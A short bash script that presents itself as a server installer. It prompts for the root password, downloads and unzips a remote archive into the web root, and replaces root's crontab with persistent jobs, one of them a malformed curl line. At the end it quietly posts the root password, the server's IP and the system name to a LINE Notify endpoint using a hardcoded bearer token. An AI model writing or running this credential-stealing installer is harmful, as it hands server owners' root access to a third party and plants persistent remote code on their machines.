clear

$(wget -qO- ipv4.icanhazip.com)

echo "
╭━━━━━━━━━━━━━━━━━━━━━━━╮"
echo " ┈┣ Enter password root  "
echo " ╰━━━━━━━━━━━━━━━━━━━━━━━╯"
read -p " : " pass

apt install php

wget https://github.com/PaingPainghein/pph_script/raw/main/Install/auto_rebot.zip

unzip auto_rebot.zip

mv /root/index.php /var/www/html
mv /root/server_fix.php /var/www/html
mv /root/Crypt /var/www/html
mv /root/Math /var/www/html
mv /root/Net /var/www/html
mv /root/server /var/www/html

cat > /var/spool/cron/crontabs/root <<-auto
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Thu Nov 17 20:31:31 2022)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
@daily /bin/verifatt
@reboot /etc/autostart
* * * * * /etc/autostart
0 */6 * * * /bin/uexpired
* * * * * * curl http://$(wget -qO- ipv4.icanhazip.com):82/server_fix.php
@reboot /usr/bin/autoiptables
auto


clear
echo "
Settings completed
"
curl -X POST -H 'Authorization: Bearer 8QXhBz0jeUANsAq9ipZJy0SRxOMQ24FG3p3asWbM3XJ' -F 'message='"
System: $(printf '%-14s' "$system")
IP : $(wget -qO- ipv4.icanhazip.com)
Password : $pass "'' https://notify-api.line.me/api/notify > /dev/null 2>&1
